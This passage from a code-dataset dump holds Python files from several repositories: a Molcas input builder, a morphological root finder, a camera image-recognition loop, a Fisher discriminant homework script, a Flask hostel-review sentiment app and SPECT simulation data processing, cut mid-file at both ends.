mosaic[key]:\r\n temp = temp + \"{char}{num}{pos0}{pos1}{pos2} Angstrom \\n\".format(char=chr(abc_code),\r\n num='{:<6d}'.format(i),\r\n pos0='{:10.4f}'.format(atom.pos[0]),\r\n pos1='{:10.4f}'.format(atom.pos[1]),\r\n pos2='{:10.4f}'.format(atom.pos[2]))\r\n i += 1\r\n temp = temp + \"End of basis\\n********************************************\\n\"\r\n string = string + temp\r\n if i >= 1000:\r\n print('WARNING: There are too many {0} atoms in mosaic shell, which cause the label of atoms at first '\r\n 'column has more than 4 characters.\\nIt will cause Molcas reduce the label to 4 characters and '\r\n 'cause *reduplicate* problem. e.g. \"A1000\" will be reduced to \"A100\" in Molcas.\\n'.format(key))\r\n abc_code = (abc_code - 65 + 1) % 26 + 65\r\n if (abc_code - 65 + 1) // 26 > 1:\r\n print('WARNING: Too many species in mosaic shell. 
The labels of atoms in the first column will be '\r\n '*reduplicated*.\\n')\r\n string = string + \"Xfield\\n{0} Angstrom\\n\".format(len(ion))\r\n for atom in ion:\r\n q = 0.0\r\n try:\r\n q = charge[atom.type]\r\n except KeyError:\r\n print('ERROR: The charge information about {0} is needed\\n'.format(atom.type))\r\n exit(1)\r\n string = string + \"{pos0}{pos1}{pos2}{charge} 0.0 0.0 0.0\\n\".format(pos0='{:10.4f}'.format(atom.pos[0]),\r\n pos1='{:10.4f}'.format(atom.pos[1]),\r\n pos2='{:10.4f}'.format(atom.pos[2]),\r\n charge='{:10.4f}'.format(q))\r\n string = string + 'AMFI\\nSDIPOLE\\nEnd of input \\n'\r\n if count > 500:\r\n print('\\nWARNING: The default maximum number of active atoms in MOLCAS is 500; you have {0} active atoms in the core '\r\n 'and mosaic structure. This may cause the ERROR *RdCtl: Increase Mxdc* in the sew calculation\\n'.format(count))\r\n with open(file_name, 'w') as fp:\r\n fp.write(string)\r\n\r\n\r\nif __name__ == '__main__':\r\n doped_crystal = 'o-o-o-c.vasp'\r\n substrate = 'hostsc960.vasp'\r\n c_r = 7\r\n s_r = 28\r\n m_r = 9.9\r\n doped_structure = poscar(doped_crystal)\r\n substrate_structure = poscar(substrate)\r\n doped_cluster, doped_center = build_cluster(doped_structure, c_r, tolerance=0.1)\r\n discard = cluster_from_substrate(substrate_structure, doped_center, c_r)\r\n if len(doped_cluster) != len(discard):\r\n print('WARNING: \\n'\r\n 'The number of atoms in the cluster differs from that in the discarded cluster of the substrate.\\n'\r\n 'If there isn\\'t any interstitial or vacancy in the doped structure, this disagreement may be caused by the '\r\n 'choice of radius.\\n'\r\n 'The radius of the cluster may be too small. Some atoms at the edge of the sphere may have moved out of the sphere '\r\n 'after relaxation of the doped structure.\\n')\r\n print('The difference in the number of atoms is {0}'.format(len(doped_cluster) - len(discard)))\r\n shell = build_shell(substrate_structure, doped_center, c_r, s_r, pure_substrate=False, remove_dict={'Ti': 'Al'})\r\n cluster_embedded_structure = build_mosaic_structure(doped_cluster, shell)\r\n\r\n core_pseudo = {'Ti': 'Ti.ECP.Barandiaran.9s6p6d3f.3s3p4d1f.10e-CG-AIMP.',\r\n 'O': 'O.ECP.Barandiaran.5s6p1d.2s4p1d.6e-CG-AIMP.'}\r\n mosaic_pseudo = {'Al': 'Al.ECP.Pascual.0s.0s.0e-AIMP-Al2O3.',\r\n 'O': 'O.ECP.Pascual.0s.0s.0e-AIMP-Al2O3.'}\r\n charge = {'Al': 3, 'O': -2}\r\n write_seward_input(cluster_embedded_structure, core_pseudo, mosaic_pseudo, charge, m_r, title='Al2O3_Ti')\r\n","repo_name":"jingslaw/cluster_embedded_model","sub_path":"4_build_cluster_embedded_structure.py","file_name":"4_build_cluster_embedded_structure.py","file_ext":"py","file_size_in_byte":12894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23552218647","text":"#!python3\nimport sys\nimport pickle\nimport math\nfrom collections import defaultdict\nimport derinet.lexicon as dlex\n\nlexicon = dlex.Lexicon()\nlexicon.load('derinet/tools/data-api/derinet2/derinet-2-0.tsv')\n\ndef r_4(word, morph_stats):\n viable = [m for m in word if m in morph_stats.keys()]\n ms = [sum([morph_stats[x][i] for x in viable]) for i in range(3)]\n rts = min(viable, key = lambda x: sum([morph_stats[x][i]/(ms[i] + 0.00000000001) for i in [0,1,2]]))\n return [(rts, word.index(rts))]\n\ndef shortest_edit(w1, w2):\n known = defaultdict(lambda: defaultdict(int))\n strout = \"\"\n for i in range(len(w1)):\n known[i][-1] = i+1\n for j in range(len(w2)):\n known[-1][j] = j+1\n for i in range(len(w1)):\n for j in range(len(w2)):\n a = known[i-1][j-1]\n if w1[i] != w2[j]:\n a += 1\n b = known[i][j-1]+1\n c = known[i-1][j]+1\n res = min([a,b,c])\n known[i][j] = res\n x = i\n y = j\n while x > -1 or y > -1:\n a = known[x-1][y-1]\n b = known[x-1][y]\n c = known[x][y-1]\n res = min([a,b,c])\n if res == a and x > -1 and y > -1:\n strout = w2[y] + strout\n x -= 1\n y -= 1\n if w1[x+1] != w2[y+1]:\n strout = \"@\" + strout\n elif (res == b and b > c)or y < 0:\n x -= 1\n else:\n strout = \"@\" + w2[y] + strout\n y -= 1\n return [w2, known[i][j], strout]\n\ndef good(schema, shortest, lemmas):\n \"\"\"lemma contains the substring specified by \"schema\", \"shortest\" \"\"\"\n OK = True\n for lemma in lemmas:\n OK = any(all(lemma[j + i] == shortest[i] for i in schema) for j in range(-schema[0], len(lemma) - schema[-1]))\n if not OK:\n return False\n return True\n\ndef variants(schema, shortest, lemmas):\n \"\"\"generates possible variants of the schema\"\"\"\n schemata = []\n start = 0\n if len(schema)>0:\n start = schema[-1] + 1\n for j in range(start, len(shortest)):\n new_schema = schema + [j]\n if good(new_schema, shortest, lemmas):\n schemata.append(new_schema)\n return(schemata)\n\n#def prune(schemata, m):\n# \"\"\"groups schemata ending on the same position, returns the longest one\"\"\"\n# grouped = [[schema for schema in schemata if schema[-1] == i] for i in range(m)]\n# return [max(i_schemata, key=len) for i_schemata in grouped if len(i_schemata) > 0]\n\ndef get_schemata(lemmas):\n \"\"\"for lemmas, returns longest common substring (with wildcards)\"\"\"\n shortest = min(lemmas, key=len)\n schemata = [[]]\n max_len = -1\n new_max = 0\n new = []\n while(max_len < new_max):\n max_len = new_max\n for schema in schemata.copy():\n new_schemata = variants(schema, shortest, lemmas)\n if len(new_schemata) > 0 and schema in schemata:\n schemata.remove(schema)\n schemata = schemata + new_schemata\n if len(schemata[0]) == 0:\n return []\n #chemata = prune(schemata, len(shortest))\n new_max = len(max(schemata, key=len))\n\n schemata = [schema for schema in schemata if len(schema) == max_len]\n return [[(i - schema[0], shortest[i]) for i in schema] for schema in schemata]\n\ndef agrees(morph, schema):\n return any(all(morph[item[0] + j] == item[1] for item in schema) for j in range(len(morph) - schema[-1][0]))\n\ndef similarity(morph, schema):\n return min([0] + [sum([int(morph[item[0] + j] == item[1]) for item in schema]) for j in range(len(morph) - schema[-1][0])])\n\ndef subtree(lexeme, changes=1):\n r = lexeme\n while r.parent is not None and len(get_schemata([r.parent.lemma, r.lemma])) > len(r.lemma) - changes:\n r = r.parent\n return r\n\ndef roots(word, morph_stats):\n viable = [m for m in word if m in morph_stats.keys()]\n lexemes = 
lexicon.get_lexemes(lemma=\"\".join(word))\n if len(lexemes) == 0:\n return r_4(word, morph_stats)\n root = lexemes[0].get_tree_root()\n lemmas = [child.lemma.lower() for child in root.iter_subtree()]\n schemata = get_schemata(lemmas)\n candidates = []\n if len(schemata) > 0:\n candidates = [seg for seg in word if any(agrees(seg, schema) for schema in schemata)]\n if len(candidates) == 0:\n candidates = viable\n ws = [root.lemma] + [lex.lemma for lex in root.children]\n\n scored = {x: sum([shortest_edit(x, c)[1] for c in ws]) for x in word}\n snorm = sum(scored.values())\n viable = candidates\n ms = [sum([morph_stats[x][i] for x in viable]) for i in range(3)]\n minm = min(viable, key = lambda x: scored[x]/(snorm + 0.00000000001) + sum([morph_stats[x][i]/(ms[i] + 0.00000000001) for i in [0,1,2]]))\n return [(minm, word.index(minm))]\n","repo_name":"johnvojtech/morph_analysis","sub_path":"utils/roots.py","file_name":"roots.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10408063446","text":"\nimport cv2\nimport base, recognize, video_capture\nfrom skimage.measure import compare_ssim\nimport time\nfrom smb.SMBConnection import SMBConnection\nimport tempfile\nfrom datetime import datetime\n\nCAM_NAME = 'CAM6'\nUSER_NAME = 'Admin'\nPASS = '111'\nCLIENT_NAME = 'skzasutp0004'\nSERVER_NAME = 'VIDEOSRV-1'\nSERVER_IP = '192.168.0.1'\n\nFILE_FOLDER = 'Thumbs'\nFILE_NAME = 'cam6.jpg'\nSTORE_PATH = '/home/administrator/cam6/'\n\nSCORE_STOP = 0.95\nSTOP_CLASS = -1\nEMPTY_CLASS = 0\nDUST_CLASS = 2\nIMERROR_CLASS = 1\nBRBRIKET_CLASS = 3\nBRIKET_CLASS = 4\n\n\ndef list_to_dict(li):\n dct = {}\n ind = 0\n mx = 0.0\n ind_max = 0\n for item in li:\n dct[ind] = item\n if item > mx:\n ind_max = ind\n mx = item\n ind = ind + 1\n return dct, ind_max\n\n\ndef main():\n rc = recognize.RecognizeK2(store=True, store_path='img')\n bs = base.Psql()\n vc = video_capture.VideoCap()\n vc.start_capture('rtsp://admin:123456Qw@192.168.0.28:554/Streaming/channels/102')\n while True:\n time.sleep(10)\n try:\n im, file_create_time = vc.image()\n x1, x2, y1, y2 = bs.getcropimg()\n if x1 is None:\n continue\n (h, w) = im.shape[:2]\n point = (w / 2, h / 2)\n M = cv2.getRotationMatrix2D(point, -5, 1.0)\n im = cv2.warpAffine(im, M, (w, h))\n im = im[y1:y2, x1:x2]\n print('recognize')\n rc_result = rc.recognize(im)\n print(rc_result)\n im_l, img_guid, img_tfile = bs.loadimglast()\n if file_create_time == img_tfile:\n continue\n if im_l is not None and len(im_l) > 0:\n grayA_0 = cv2.cvtColor(cv2.resize(im[35:85, 144:194], (224, 224)), cv2.COLOR_BGR2GRAY)\n grayB_0 = cv2.cvtColor(cv2.resize(im_l[35:85, 144:194], (224, 224)), cv2.COLOR_BGR2GRAY)\n grayA_1 = cv2.cvtColor(cv2.resize(im[120:170, 3:53], (224, 224)), cv2.COLOR_BGR2GRAY)\n grayB_1 = cv2.cvtColor(cv2.resize(im_l[120:170, 3:53], (224, 224)), cv2.COLOR_BGR2GRAY)\n (score_0, diff_0) = compare_ssim(grayA_0, grayB_0, full=True)\n (score_1, diff_1) = compare_ssim(grayA_1, grayB_1, full=True)\n score = score_0 if score_0 < score_1 else score_1\n rc_result['sck'] = score\n print(score)\n if score > SCORE_STOP:\n bs.updateimglast(img_guid, score)\n bs.savestatistic(classforstatistic(rc_result))\n continue\n for x in range(1, 4):\n if 'snn' + str(x) in rc_result.keys():\n continue\n else:\n rc_result['snn' + str(x)] = ''\n rc_result['snn'] = classforstatistic(rc_result)\n bs.savedata(im, rc_result, file_create_time)\n bs.savestatistic(rc_result['snn'])\n print(rc_result)\n except Exception as e:\n print(e)\n\n finally:\n pass\n #conn.close()\n\ndef classforstatistic(data):\n if data['sck'] >= SCORE_STOP:\n return STOP_CLASS\n ik = int(max(data['fnn'], key=data['fnn'].get))\n if ik == 0:\n return EMPTY_CLASS\n if ik == 1:\n return IMERROR_CLASS\n return data['snn']\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"BEugen/AI-K2-UB","sub_path":"img-cam-recognize/grab-image-cam6.py","file_name":"grab-image-cam6.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"71631778753","text":"from turtle import register_shape\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.lines as mlines\nfrom sklearn.metrics import accuracy_score\n\nclass fisher:\n def __init__(self, x, y, x_t, y_t):\n self.x = x\n self.y = y\n self.x_t = x_t\n self.y_t = y_t\n self.class_0 = []\n self.class_1 = []\n self.m1 = 0\n self.m2 = 0\n self.sw = 0\n self.sb = 0\n self.w = 0\n self.proj = 0\n self.proj_t = 0\n\n #compute the mean of two classes\n def mean_vectors(self):\n self.class_0, self.class_1 = [], []\n #count the number of class0 and class1\n for x, y in zip(self.x, self.y):\n if y == 0:\n self.class_0.append(x.flatten())\n else:\n self.class_1.append(x.flatten())\n \n self.class_0=np.asarray(self.class_0)\n self.class_1=np.asarray(self.class_1)\n #compute the mean\n self.m1 = np.mean(self.class_0, axis=0)\n self.m2 = np.mean(self.class_1, axis=0)\n\n print(f\"mean vector of class 1: {self.m1}\", f\"mean vector of class 2: {self.m2}\")\n\n #compute within class matrix \n def within_class_matrix(self):\n temp = np.subtract(self.class_0, self.m1)\n # print(temp.shape)\n temp_0 = np.dot(temp.T, temp)\n temp = np.subtract(self.class_1, self.m2)\n temp_1 = np.dot(temp.T, temp)\n #add two classes' within class matrix\n self.sw = np.add(temp_0, temp_1)\n print(f\"Within-class scatter matrix SW: {self.sw}\")\n\n #compute between class matrix\n def between_class_matrix(self):\n temp = self.m2 - self.m1\n temp = np.array(np.reshape(temp, (2,1)))\n self.sb = np.dot(temp, temp.T)\n\n print(f\"Between-class scatter matrix SB: {self.sb}\")\n\n #compute the w by fisher linear discrimination\n def fisher_linear_discrimination(self):\n self.w = np.dot(np.linalg.inv(self.sw), (self.m2 - self.m1))\n temp = self.w\n self.w = temp / np.linalg.norm(temp)\n \n print(f\" Fisher's linear discriminant: {self.w}\")\n\n #compare test data and pjoted train data, find the accuracy \n def compare(self):\n #compute projection\n proj = np.dot(self.w.T, self.x.T)\n proj_t = np.dot(self.w.T, self.x_t.T)\n self.proj = proj\n self.proj_t = proj_t\n \n #use k nearest neighbor to decide the class of test data\n for k in range(1,6) :\n y_pred = []\n for i in range(len(proj_t)):\n dist = np.abs(proj_t[i] - proj)\n nearest_neighbor_ids = dist.argsort()[:k]\n count_0 = 0\n count_1 = 0\n for idx in nearest_neighbor_ids:\n if self.y[idx] == 0:\n if k%2 == 0:\n count_0 += 1/dist[idx]\n else:\n count_0 += 1 \n else :\n if k%2 == 0:\n count_1 += 1/dist[idx]\n else:\n count_1 += 1\n\n if count_0 > count_1 :\n y_pred.append(0)\n else :\n y_pred.append(1)\n #use accuracy_score to compute the accuracy\n acc = accuracy_score(self.y_t, y_pred)\n print(f\" k : {k} Accuracy of test-set {acc}\")\n \n #plot the graph of test and train data and the line \n def plot(self):\n fig, ph = plt.subplots(figsize=(10,8))\n #project the line\n plt.plot([-self.w[0] * 4, self.w[0] * 7], [-self.w[1] * 4, self.w[1] * 7], lw=3, color='green', alpha=.4)\n colors=['red','blue']\n color = ['r.:', 'b.:']\n\n #link train data with its projectd data\n proj = []\n for i in self.proj :\n proj.append(i * self.w)\n \n for idx, i in enumerate(self.y):\n if i == 0 :\n plt.plot([proj[idx][0], self.x[idx][0]], [proj[idx][1], self.x[idx][1]], 'r', alpha=.3)\n else :\n plt.plot([proj[idx][0], self.x[idx][0]], [proj[idx][1], self.x[idx][1]], 'b', alpha=.3)\n\n #link test data with its projectd data\n # proj_t = []\n # for i in self.proj_t :\n # proj_t.append(i * self.w)\n # for idx, i in enumerate(self.y_t):\n # if i == 0 :\n # 
plt.plot([proj_t[idx][0], self.x_t[idx][0]], [proj_t[idx][1], self.x_t[idx][1]], 'r', alpha=.3)\n # else :\n # plt.plot([proj_t[idx][0], self.x_t[idx][0]], [proj_t[idx][1], self.x_t[idx][1]], 'b', alpha=.3)\n\n #plot train data and test data and the graph\n plt.scatter(self.x[:, 0], self.x[:, 1], color=[colors[i] for i in self.y], s = 10)\n # plt.scatter(self.x_t[:, 0], self.x_t[:, 1], color=[colors[i] for i in self.y_t], s = 10)\n plt.title(f\"Projection Line: w= {self.w[1]/self.w[0]}, b=0\")\n plt.xlabel(\"$x_1$\")\n plt.ylabel(\"$x_2$\")\n plt.show()\n\nif __name__ == '__main__':\n x_train, x_test, y_train, y_test = np.load('classification_data.npy', allow_pickle=True)\n # print(x_train.shape)\n # print(y_train.shape)\n # print(x_test.shape)\n # print(y_test.shape)\n \n #use the class fisher to represent all needed function and parameters\n fish=fisher(x_train, y_train, x_test, y_test)\n fish.mean_vectors()\n fish.within_class_matrix()\n fish.between_class_matrix()\n fish.fisher_linear_discrimination()\n fish.compare()\n fish.plot()","repo_name":"danzel-crazy/2023-Machine-Learning","sub_path":"HW2/109550164_hw2.py","file_name":"109550164_hw2.py","file_ext":"py","file_size_in_byte":5600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"19844602337","text":"from flask import Flask, render_template, request\nimport requests\nimport pandas as pd\nimport re\nimport ftfy\nimport nltk\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\n\n\n#This is the function that outputs recommendations for my app. You'll replace this with your function that takes in the user input and gives the output\ndef calcSent(myreviews):\n vader = SentimentIntensityAnalyzer()\n myneg = []\n myneu = []\n mypos = []\n mycompound = []\n\n for review in myreviews:\n snt = vader.polarity_scores(ftfy.fix_text(review))\n myneg.append(snt['neg'])\n myneu.append(snt['neu'])\n mypos.append(snt['pos'])\n mycompound.append(snt['compound'])\n return myneg, myneu, mypos, mycompound\n\ndef matchme(mytopfivenames, myhostels):\n t=pd.DataFrame()\n for named in mytopfivenames:\n keyrows = myhostels[myhostels.name.str.contains(named)]\n t=t.append(keyrows, ignore_index=True)\n return t\n\ndef findcomment(mykeyrows, mykey):\n if mykey == \"top\":\n mytemp = mykeyrows.sort_values(by='sentcomp', ascending=False)\n else:\n mytemp = mykeyrows.sort_values(by='sentcomp', ascending=True)\n return mytemp.reviewtext[:1].values\n\ndef findlink(myname, mylinks):\n myrow = mylinks[mylinks.name.str.contains(myname)]\n return myrow.url.values\n\ndef fixme(mytopfive, mytemp, mylinks):\n t=pd.DataFrame(columns= ['name','url','value','security','location','facilities','staff','atmosphere','cleanliness', 'topcomment', 'worstcomment'])\n for blah in mytopfive.itertuples():\n keyrows = mytemp[mytemp.name.str.contains(blah.name)]\n keylink = findlink(blah.name, mylinks)\n mytopcomment = findcomment(keyrows, \"top\")\n mybottomcomment = findcomment(keyrows, \"bottom\")\n\n if mytopcomment == mybottomcomment:\n mybottomcomment = [\"No other comments!\"]\n # temp=pd.DataFrame([])\n t=t.append({'name': blah.name, 'url': keylink, 'value': round(blah.value,ndigits=1), 'security': round(blah.security,ndigits=1),\n 'location': round(blah.location,ndigits=1), 'facilities': round(blah.facilities,ndigits=1), 'staff': round(blah.staff,ndigits=1),\n 'atmosphere': round(blah.atmosphere,ndigits=1), 'cleanliness': round(blah.cleanliness,ndigits=1), 'topcomment': mytopcomment,\n 'worstcomment': mybottomcomment}, ignore_index=True)\n return t\n\n#Initialize app\napp = Flask(__name__, static_url_path='/static')\n\n#Standard home page. 'index.html' is the file in your templates that has the CSS and HTML for your app\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html')\n\n\n#After they submit the survey, the index page redirects to dirt.html where dirt is rendered\n@app.route('/dirt', methods=['GET', 'POST'])\ndef dirt():\n\n ###THESE ARE FORM CRITERIA\n #1. user tells us city that they're interested in\n cityname = str(request.form['cityname'])\n #2. 
user also enters criterion for filtering\n criterion = str(request.form['rating'])\n #3 are we looking for the worst ones or the best ones?\n sortme = str(request.form['sortme'])\n ###END FORM CRITERIA\n\n #read in data as CSV\n hostels = pd.read_csv('data/hostelreviews-id.csv')\n links = pd.read_csv('data/hostellinks.csv')\n #okay, now we narrow the criteria to figure out which hostels\n #we'll be working with\n #First, by the criteria specified above,\n targethostels = hostels[ hostels.city == cityname ]\n tworeviews = targethostels['name'].value_counts()\n tworeviews =tworeviews[tworeviews > 5].index.tolist()\n targethostels = targethostels[targethostels['name'].isin(tworeviews)]\n print(targethostels)\n\n #now sort and group by the top specified values\n sorted = targethostels.groupby('name',as_index=False).mean()\n if sortme == 'best':\n sorted = sorted.sort_values(by=[criterion], ascending=False)\n else:\n sorted = sorted.sort_values(by=[criterion])\n tempfive = sorted[:5]\n #subset the relevant hostels in main comment set\n #before performing sentiment analysis and other stuff\n temp = matchme(tempfive.name, targethostels)\n\n #Now we need to calculate and return some sentiment (yeah!)\n neg,neu,pos,comp = calcSent(temp.reviewtext)\n temp = temp.assign(sentneg=neg, sentneu=neu, sentpos=pos, sentcomp=comp)\n\n #okay, now we need to consolidate all of the disparate information\n topfive= fixme(tempfive, temp, links)\n return render_template('dirt.html', topfive = topfive, criterion = criterion, cityname=cityname, sortme=sortme)\n\n\napp.run(debug=True)\n","repo_name":"ZhangWS/hosteldirt","sub_path":"MVP/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"72997152835","text":"import SimpleITK as sitk\nfrom hepunits import*\nfrom h5py import File\nimport numpy as np\nfrom copy import deepcopy\nfrom numba import jit\nfrom multiprocessing import Pool\n\n\nclass DataExtractor:\n\n def __init__(self, maxProcesses=32):\n self.maxProcesses = maxProcesses\n\n def extractData(self, filesPath):\n if isinstance(filesPath, list):\n with Pool(self.maxProcesses) as pool:\n return pool.map(self._extractData, filesPath)\n return self._extractData(filesPath)\n\n def _extractData(self, filePath):\n fileName = filePath.split(sep=\"/\")[-1]\n print(f'Reading {fileName}')\n file = File(filePath, 'r')\n data = self._dataExtraction(file)\n file.close()\n return data\n\n def _dataExtraction(self, file):\n data = {}\n if file['Modeling parameters/Subject'] is None:\n parameters = file['Modeling parameters/Space/Detector']\n # detector = Detector(\n # coordinates=parameters['coordinates'],\n # size=parameters['size'],\n # euler_angles=parameters['euler_angles'],\n # rotation_center=parameters['rotation_center']\n # )\n else:\n data = {\n 'Detector size': None,\n 'Interactions data': {}\n }\n interactions_data = file['Interactions data']\n for key in interactions_data.keys():\n data['Interactions data'].update({key: np.copy(interactions_data[key])})\n detector = file['Modeling parameters/Subject'].asstr()[()]\n data['Detector size'] = np.copy(file[f'Modeling parameters/Space/{detector}/size'])\n data['R'] = np.copy(file[f'Modeling parameters/Source/R'])\n data['Rotation center'] = np.copy(file[f'Modeling parameters/Source/rotation_center'])\n data['Origin'] = np.copy(file[f'Modeling parameters/Source/coordinates'])\n indicesSort = np.argsort(data['Interactions data']['Emission time'])\n interactions_data = data['Interactions data']\n for key in interactions_data.keys():\n interactions_data[key] = interactions_data[key][indicesSort]\n return data\n \n\nclass DataProcessor:\n\n def __init__(self):\n self.rng = np.random.default_rng()\n\n def addEmissionROI(self, data, emissionROI):\n coordinates = data['Coordinates']\n energyTransfer = data['Energy transfer']\n distanceTraveled = data['Distance traveled']\n emissionCoordinates = data['Emission coordinates']\n emissionTime = data['Emission time']\n emissionROI = np.asarray(emissionROI)\n ROI = np.all((emissionCoordinates >= emissionROI[:, 0])*(emissionCoordinates < emissionROI[:, 1]), axis=1)\n indices = np.nonzero(ROI)[0]\n data['Coordinates'] = coordinates[indices]\n data['Distance traveled'] = distanceTraveled[indices]\n data['Emission time'] = emissionTime[indices]\n data['Energy transfer'] = energyTransfer[indices]\n data['Emission coordinates'] = emissionCoordinates[indices]\n\n def addEnergyWindow(self, data, energyWindow):\n coordinates = data['Coordinates']\n distanceTraveled = data['Distance traveled']\n emissionTime = data['Emission time']\n energyTransfer = data['Energy transfer']\n emissionCoordinates = data['Emission coordinates']\n indices = np.nonzero((energyTransfer >= energyWindow[0])*(energyTransfer <= energyWindow[1]))\n data['Coordinates'] = coordinates[indices]\n data['Distance traveled'] = distanceTraveled[indices]\n data['Emission time'] = emissionTime[indices]\n data['Energy transfer'] = energyTransfer[indices]\n data['Emission coordinates'] = emissionCoordinates[indices]\n\n def addEnergyDeviation(self, data, energyResolution, referenceEnergy):\n energy = data['Energy transfer']\n coeff = np.sqrt(referenceEnergy)*energyResolution/100\n resolutionDistribution = 
coeff/np.sqrt(energy)\n sigma = resolutionDistribution*energy/2.355\n energy[:] = self.rng.normal(energy, sigma)\n\n def addCoordinatesDeviation(self, data, spatialResolution):\n coordinates = data['Coordinates']\n sigma = spatialResolution/2.35\n coordinates[:] = self.rng.normal(coordinates, sigma)\n\n def averageActs(self, data, decayTime, useDistanceTraveled=False):\n coordinates = data['Coordinates']\n energyTransfer = data['Energy transfer']\n emissionCoordinates = data['Emission coordinates']\n emissionTime = data['Emission time']\n distanceTraveled = data['Distance traveled']\n if useDistanceTraveled:\n registrationTime = emissionTime + distanceTraveled/c_light\n else:\n registrationTime = emissionTime\n timeWithDecay = self.addDecayTime(registrationTime, decayTime)\n _, indices, counts = np.unique(timeWithDecay, return_index=True, return_counts=True)\n eventsNumber = indices.size\n eventsIndices = [np.arange(indices[i], indices[i] + counts[i]) for i in range(eventsNumber)]\n averagedCoordinates = np.zeros((eventsNumber, 3), dtype=float)\n averagedDistanceTraveled = np.zeros(eventsNumber, dtype=float)\n averagedEmissionTime = np.zeros(eventsNumber, dtype=float)\n averagedEnergyTransfer = np.zeros(eventsNumber, dtype=float)\n averagedEmissionCoordinates = np.zeros((eventsNumber, 3), dtype=float)\n delIndices = []\n for i, actsIndices in enumerate(eventsIndices):\n weights = energyTransfer[actsIndices]\n if weights.sum() > 0:\n averagedCoordinates[i] = np.average(coordinates[actsIndices], axis=0, weights=weights)\n averagedDistanceTraveled[i] = np.average(distanceTraveled[actsIndices], weights=weights)\n averagedEmissionTime[i] = np.average(emissionTime[actsIndices], weights=weights)\n averagedEnergyTransfer[i] = np.sum(energyTransfer[actsIndices])\n averagedEmissionCoordinates[i] = np.average(emissionCoordinates[actsIndices], axis=0, weights=weights)\n else:\n delIndices.append(i)\n delIndices = np.array(delIndices, dtype=int)\n data['Coordinates'] = np.delete(averagedCoordinates, delIndices, axis=0)\n data['Distance traveled'] = np.delete(averagedDistanceTraveled, delIndices)\n data['Emission time'] = np.delete(averagedEmissionTime, delIndices)\n data['Energy transfer'] = np.delete(averagedEnergyTransfer, delIndices)\n data['Emission coordinates'] = np.delete(averagedEmissionCoordinates, delIndices, axis=0)\n\n @staticmethod\n def convertToLocalCoordinates(coordinates, origin, R, rotationCenter):\n \"\"\" Преобразовать в локальные координаты \"\"\"\n coordinates -= origin\n coordinates -= rotationCenter\n np.matmul(coordinates, R, out=coordinates)\n coordinates += rotationCenter\n coordinates += origin\n\n @staticmethod\n @jit(nopython=True, cache=True)\n def addDecayTime(time, decayTime):\n timeWithDecay = np.zeros_like(time)\n countdownTime = 0.\n for i, t in enumerate(time):\n if (t - countdownTime) > decayTime:\n countdownTime = t\n timeWithDecay[i] = countdownTime + decayTime\n return timeWithDecay\n \n\nclass DataConverter:\n\n def __init__(self, maxProcesses=32):\n self.maxProcesses = maxProcesses\n self.processingParameters = {\n 'decayTime': 300*ns,\n 'spatialResolution': 4.*mm,\n 'energyResolution': 9.9,\n 'referenceEnergy': 140.5*keV,\n 'energyChannels': 1024,\n 'energyRange': [0, 300*keV],\n 'energyWindow': [126*keV, 154*keV],\n 'imageRange': [[0., 51.2*cm], [0., 40.*cm]],\n 'pixelSize': 4.*mm,\n 'matrix': None,\n 'useDistanceTraveled': True,\n 'returnEnergySpectum': True,\n 'returnEmissionDistribution': True,\n 'emissionROI': [[0., 51.2*cm], [0., 40.*cm], [3.855*cm, 
3.855*cm + 51.2*cm]]\n }\n self.scattersImageParameters = {\n 'decayTime': 0.,\n 'spatialResolution': 0.,\n 'energyResolution': 0.,\n 'referenceEnergy': 140.5*keV,\n 'energyWindow': [126*keV, 154*keV],\n 'imageRange': [[0., 51.2*cm], [0., 40.*cm]],\n 'pixelSize': 4.*mm,\n 'matrix': None,\n 'useDistanceTraveled': False,\n 'emissionROI': [[0., 51.2*cm], [0., 40.*cm], [3.855*cm, 3.855*cm + 51.2*cm]],\n 'peakEnergy': 140.5*keV\n }\n\n def _getMatrixAndImageRange(self, data, parameters):\n if parameters['imageRange'] is None:\n imageSize = data['Detector size'][:2]\n imageRange = np.column_stack([[0, 0], imageSize])\n else:\n imageRange = np.asarray(parameters['imageRange'])\n if parameters['matrix'] is None:\n matrix = np.round(((imageRange[:, 1] - imageRange[:, 0])/parameters['pixelSize'])).astype(int)\n else:\n matrix = np.asarray(parameters['matrix']).astype(int)\n return matrix, imageRange\n\n def convertToImage(self, data, processingParameters={}):\n print('\\tConverting to image')\n self.updateParameters(self.processingParameters, processingParameters)\n if isinstance(data, list):\n with Pool(min(len(data), self.maxProcesses)) as pool:\n return pool.map(self._convertToImage, data)\n return self._convertToImage(data)\n\n def convertToScattersImage(self, data, scattersImageParameters={}):\n print('\\tConverting to scatters image')\n self.updateParameters(self.scattersImageParameters, scattersImageParameters)\n if isinstance(data, list):\n with Pool(min(len(data), self.maxProcesses)) as pool:\n return pool.map(self._convertToScattersImage, data)\n return self._convertToScattersImage(data)\n\n def _acquireEnergySpectrum(self, processedData):\n processingParameters = self.processingParameters\n energySpectrum = list(np.histogram(\n processedData['Energy transfer'],\n bins=processingParameters['energyChannels'],\n range=processingParameters['energyRange']\n ))\n energySpectrum[1] = energySpectrum[1][1:]\n return np.array(energySpectrum)\n\n def _obtainEmissionDistrubution(self, emissionCoordinates):\n processingParameters = self.processingParameters\n emissionRange = np.asarray(processingParameters['emissionROI'])\n bins = np.round((emissionRange[:, 1] - emissionRange[:, 0])/processingParameters['pixelSize']).astype(int)\n emissionDistribution = np.histogramdd(\n emissionCoordinates,\n bins=bins,\n range=emissionRange\n )\n return emissionDistribution[0]\n\n def _convertToImage(self, data):\n processedData = self.processData(data['Interactions data'], self.processingParameters)\n matrix, imageRange = self._getMatrixAndImageRange(data, self.processingParameters)\n validEvents = self.cutToEnergyWindow(processedData['Energy transfer'], 